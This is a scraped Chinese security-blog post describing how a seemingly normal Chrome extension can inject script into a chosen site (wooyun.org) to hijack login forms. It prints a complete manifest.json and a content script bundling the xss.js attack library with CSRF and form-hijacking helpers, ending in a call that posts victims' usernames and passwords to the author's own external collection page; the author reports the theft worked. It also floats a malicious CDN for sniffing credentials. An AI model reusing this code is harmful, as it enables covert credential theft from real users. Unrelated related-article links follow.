资源来自:http://www.2cto.com/Article/201307/225986.html
首页 > 安全 > 网站安全 > 正文
利用Chrome插件向指定页面植入js,劫持 XSS,一些猥琐的想法与实践
2013-07-08      0个评论      
收藏    我要投稿
 
 
0x00 Chrome插件
--------------------------
这个想法是昨天看到@紫梦芊 的帖子想起来的。
想法如下:
Chrome插件是可以通过manifest.json的控制,向指定页面植入contentscript.js里的脚本的。那么,能不能在一个看似正常的插件里,安放一个小功能:在所有乌云的页面里<script src=//xsser.me></script>呢?
于是,开始实践。(为了方便,只是弹了一个小框框)。
Manifest.json内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
  "name": "XiaoChaJian",
  "version": "1.0",
  "manifest_version": 2,
  "author":"VIP",
  "icons": {
      "128": "icon.png"
   },
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],
  "content_scripts": [
    {"js":["contentscript.js"],"matches": ["http://wooyun.org/*","http://*.wooyun.org/*"]}
   ]
}

contentscript.js内容:

alert(/xss/);

那么,将弹框换成xsser.me,是不是就能截获想要的cookies了呢?
很遗憾,这种方法在乌云无效,因为乌云的cookies是HTTP-ONLY的。虽然插件上也能获取http-only的cookies(像Edit this cookie和cookie快速模拟一样),但是很麻烦,于是,又有一个猥琐的想法诞生了:在乌云的登录页面中,插入@Sogili的xss.js来劫持表单,是不是就能把用户名和密码发送到我们想要的地方去了呢?
开始实践:
Manifest.json内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
{
  "name": "JieChiBiaoDan",
  "version": "1.0",
  "manifest_version": 2,
  
  
"author":"VIP",
  "icons": {
      "128": "icon.png"
  
  
},
  "permissions": [
    "tabs","http://*/*","https://*/*"
  ],
  
  
"content_scripts": [
    {"js":["contentscript.js"],"matches":
  
  
  
  
]
}
contentscript.js内容:
;;var xss = function(){
  var x = {
    'name':'xss.js',
    'version':'0.2.1',
    'author':'长短短(sogili)'
  };
  
  x.x=function(id){return document.getElementById(id)};
  
  //容错取值
  x.e=function(_){try{return eval('('+_+')')}catch(e){return''}};
  
  //浏览器
  x.i={
    i:!!self.ActiveXObject&&(function(){
      for(var v=6,s=document.createElement('s');
        s.innerHTML='<![if gt IE '+(v++)+']
  
><i></i><![endif]-->',
        s.getElementsByTagName('i')[0];);
      return v;
    }()),
    c:!!self.chrome,
    f:self.mozPaintCount>-1,
    o:!!self.opera,
    s:!self.chrome&&!!self.WebKitPoint
  };
  
  //UA
  x.ua = navigator.userAgent;
  
  //判断是否为苹果手持设备
  x.apple=/ip(one|ad|od)/i.test(x.ua);
  
  //随机数
  x.rdm=function(){return~~(Math.random()*1e5)};
  
  //url编码(UTF8)
  x.ec=encodeURIComponent;
  
  x.html=function(){
    return document.getElementsByTagName('html')[0]
        ||document.write('<html>')
        ||document.getElementsByTagName
  
('html')[0];
  };
  
  /*
   * 销毁一个元素
   */
  x.kill=function(e){
    e.parentElement.removeChild(e);
  };
  
  /*
   *绑定事件
   */
  x.bind=function(e,name,fn){
    e.addEventListener?e.addEventListener
  
(name,fn,false):e.attachEvent("on"+name,fn);
  };
  
  /*
   * dom准备完毕时执行函数
   */
  x.ready=function(fn){
    if(!x.i.i){
      x.bind(document,'DOMContentLoaded',fn);
    }else{
      var s = setInterval(function(){
        try{
          document.body.doScroll('left');
          clearInterval(s);
          fn();
        }catch(e){}
      },4);
    }
  }
  
  /*
   * 同源检测
   */
  x.o=function(url){
    var link = x.dom('<a href="'+encodeURI(url)+'">',1);
    return link.protocol+link.hoatname+':'+(link.port||80)
  
==location.protocol+location.hoatname+':'+(location.port||80);
  };
  
  /*
   * html to dom
   */
  x.dom=function(html,gcsec){
    var tmp = document.createElement('span');
    tmp.innerHTML=html;
    var e = tmp.children[0];
    e.style.display='none';
    x.html().appendChild(e);
    gcsec>>0>0&&setTimeout(function(){
      x.kill(e);
    },gcsec*1000);
    return e;
  };
  
  /*
   * ajax
   */
  x.ajax=function(url,params,callback){
    (params instanceof Function)&&
  
(callback=params,params=void(0));
    var XHR = (!x.o(url)&&window.XDomainRequest)||
          window.XMLHttpRequest||
          (function(){return new ActiveXObject
  
('MSXML2.XMLHTTP')});
    var xhr = new XHR();
    xhr.open(params?'post':'get',url);
    xhr.withCredentials = true;
    try{params&&xhr.setRequestHeader('content-
  
type','application/x-www-form-urlencoded');}catch(e){}
    callback&&(xhr.onreadystatechange = function() {
      (this.readyState == 4 && ((this.status >= 200
  
&& this.status <= 300) || this.status == 304))&&callback.apply
  
(this,arguments);
    });
    xhr.send(params);
  };
  
  /*
   * CSRF
   */
  x.csrf=function(url,params,callback){
    (params instanceof Function)&&
  
(callback=params,params=void(0));
    if(params){
      var form = x.dom('<form method=post>');
      form.action=url;
      for(var name in params){
        var input = document.createElement
  
('input');
        input.name=name;
        input.value=params[name];
        form.appendChild(input);
      }
      var iframe = x.dom('<iframe sandbox
  
name=_'+x.rdm()+'_>',6);
      callback&&setTimeout(function(){
        x.bind(iframe,'load',callback);
      },30);
      form.target=iframe.name;
      form.submit();
    }else{
      var img = new Image();
      callback&&(img.onerror=callback);
      img.src=url;
    }
  };
  
  /*
   * 表单劫持
   */
  x.xform=function(form,action){
  
  
form.old_action=form.action,form.old_target=form.target,form.action=act
  
ion;
    var iframe = x.dom('<iframe name=_'+x.rdm()+'_>');
    form.target=iframe.name;
    setTimeout(function(){
      x.bind(iframe,'load',function(){
  
  
form.action=form.old_action,form.target=form.old_target,form.onsubmit=n
  
ull,form.submit();
      });
    },30);
  };
  
  /*
   * 函数代理
   */
  x.proxy=function(fn,before,after){
    return function(){
      before&&before.apply(this,arguments);
      var result = fn.apply(this,arguments);
      after&&after.apply(this,arguments);
      return result;
    }
  };
  
  return x;
}();
xss.xform(document.forms[1],'http://vip.yupage.com/wy.php');//劫持表单

http://vip.yupage.com/wy.php是我做好的一个接收页面,代码如下:

开始测试,打开登录页,填好用户名密码验证码,点击登录,首先会像我的接收页发起POST,然后才会POST乌云。

再去看看,用户名密码已经躺在那里了。

在不知情的情况下,用户名和密码就这样被劫持走了。乌云的wb转账功能可是没有二次验证的哦。
0x01 CDN
---------------
现在有许许多多的网站使用了CDN来进行加速/防D等。
去搜索了下CDN的工作原理,大概是这样的。
用户访问-》自动分配最快的节点-》请求原服务器-------
返回给用户《-返回给节点服务器《-原服务器返回数据<-|
那么,能不能搭建一台恶意的CDN,然后嗅探所有使用了该CDN的网站的用户名密码呢?
 

利用Chrome插件向指定页面植入js,劫持 XSS的更多相关文章

  1. 前端性能优化之利用 Chrome Dev Tools 进行页面性能分析

    背景 我们经常使用 Chrome Dev Tools 来开发调试,但是很少知道怎么利用它来分析页面性能,这篇文章,我将详细说明怎样利用 Chrome Dev Tools 进行页面性能分析及性能报告数据 ...

  2. 利用chrome插件批量读取浏览器页面内容并写入数据库

    试想一下,如果每天要收集100页网页数据甚至更多.如果采用人工收集会吐血,用程序去收集也就成为一个不二的选择.首先肯定会想到说用java.php.C#等高级语言,但这偏偏又有个登陆和验证码,搞到无所适 ...

  3. Chrome插件触发web页面的事件

    Chrome插件中不能直接调用Web页面的元素js,原因是chrome插件的机制http://stackoverflow.com/questions/17819344/triggering-a-cli ...

  4. chrome插件访问原始页面的变量

    开发chrome插件时遇到需要获取原始网页中的一个js变量的值问题.由于content.js和原始网页的作用域环境不同,无法直接获取变量的值,提示undefined.谷歌找到大神提供的办法.综合起来记 ...

  5. Windows下利用Chrome调试IOS设备页面

    本文介绍如何在 Windows 系统中连接 iOS设备 并对 Web 页面进行真机调试 必须前提 iOS设备.数据线 Node.js 环境 Chrome 浏览器 环境准备 安装Node环境 参考Nod ...

  6. 利用Google Chrome开发插件,在网页中植入js代码

    Google Chrome是一个很强大的浏览器,提供了各种各样的插件,大大提升了使用了的效率,比如vimium.honx等. Google在提供这些插件的同时还允许用户开发自己的插件. 最近在写js的 ...

  7. Chrome插件(Extensions)开发攻略

    本文将从个人经验出发,讲述为什么需要Chrome插件,如何开发,如何调试,到哪里找资料,会遇到怎样的问题以及如何解决等,同时给出一个个人认为的比较典型的例子——获取网页内容,和服务器交互,再把信息反馈 ...

  8. 【干货】Chrome插件(扩展)开发全攻略(不点进来看看你肯定后悔)

    写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...

  9. 【干货】Chrome插件(扩展)开发全攻略

    写在前面 我花了将近一个多月的时间断断续续写下这篇博文,并精心写下完整demo,写博客的辛苦大家懂的,所以转载务必保留出处.本文所有涉及到的大部分代码均在这个demo里面:https://github ...

随机推荐

  1. iOS OC内联函数 inline的详解

    inline 在iOS中的一些框架中,static inline是经常出现的关键字组合. static自不用多说,表示在当前文件中应用,如 static A, 在其它文件中也可以出现static A. ...

  2. IOS的UI基础01

    内容大纲:(红色表示博主个人重点记忆) 1.指定启动界面 带箭头就是首次启动的页面2.两个常用的快捷键3.拖线子控件注意事项4.一般情况下,UIView的容器是控制器的View.5.didRecive ...

  3. 代码校验工具 SublimeLinter 的安装与使用

    SublimeLinter 是 Sublime 的插件,它的作用是检查代码语法是否有错误,并提示.习惯了 IDE 下写代码的人一定需要一款在 Sublime 上类似的语法检查工具.下面我们开始. 安装 ...

  4. Effective Java 70 Document thread safety

    Principle The presence of the synchronized modifier in a method declaration is an implementation det ...

  5. tair源码分析——leveldb新增的CompactRangeSelfLevel过程

    tair是一个分布式KV存储引擎,当新增机器或者有机器down掉的时候,tair的dataserver会根据ConfigServer生成的新的对照表进行数据的迁移和清理.在数据清理的过程中就用到了在t ...

  6. 《SQL Server企业级平台管理实践》读书笔记——几个系统库的备份与恢复

    master数据库 master作为数据库的主要数据库,记录着SQL Server系统的所有系统级信息,例如登录用户.系统配置设置.端点和凭证以及访问其他数据服务器所需要的信息.master数据库还记 ...

  7. java控制台输入

    一.java控制台输入 java控制台输入有如下几个方法 1.JDK 1.4 及以下版本读取的方法 JDK 1.4 及以下的版本中要想从控制台中输入数据只有一种办法,即使用System.in获得系统的 ...

  8. 【windows环境下】RabbitMq的安装和监控插件安装

    RabbitMq的安装: RabbitMQ是基于Erlang的,所以必须先配置Erlang环境. 下载Erlang,地址:http://www.erlang.org/download/otp_win3 ...

  9. Android 系统架构

    Android 系统从下至上分为四层:Linux 内核.Android 核心库及Android 运行时环境(Android Runtime). 应用程序框架以及应用程序等. Linux 内核(Linu ...

  10. uva 699 the falling leaves——yhx

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAA3QAAAMsCAIAAACTL3d2AAAgAElEQVR4nOx9y7GuPA4tKRADk/92T8 ...